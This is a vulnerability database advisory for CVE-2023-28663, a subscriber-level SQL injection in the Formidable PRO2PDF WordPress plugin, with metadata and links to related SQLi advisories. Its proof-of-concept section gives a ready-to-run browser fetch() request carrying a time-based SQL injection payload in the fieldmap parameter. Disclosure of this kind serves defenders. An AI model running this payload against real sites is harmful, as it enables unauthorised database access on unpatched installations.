Formidable PRO2PDF < 3.11 – Subscriber+ SQLi | CVE 2023-28663 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the fieldmap parameter before using it in a SQL statement via the fpropdf_export_file AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=fpropdf_export_file&fieldmap=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(1)))a)',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

formidablepro-2-pdf

Fixed in 3.11

References

CVE

URL

https://www.tenable.com/security/research/tra-2023-2

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Joshua Martinelle (Tenable Research)

Verified

No

WPVDB ID

dfa283f6-b0f3-4aa1-9fc4-52e2474c9f80

Timeline

Publicly Published

2023-03-22 (about 3 years ago)

Added

2023-03-23 (about 3 years ago)

Last Updated

2023-03-23 (about 3 years ago)

Other

Published

Title

Published

2024-06-06

Title

Tutor LMS – eLearning and online course solution < 2.7.2 -Authenticated (Administrator+) SQL Injection

Published

2024-07-09

Title

WpStickyBar <= 2.1.0 - Unauthenticated SQLi

Published

2022-02-16

Title

WP Statistics < 13.1.6 - Unauthenticated Blind SQL Injection via IP

Published

2014-08-01

Title

Simple Forum 1.10-1.11 - SQL Injection

Published

2022-04-28

Title

Hermit <= 3.1.6 - Subscriber+ SQLi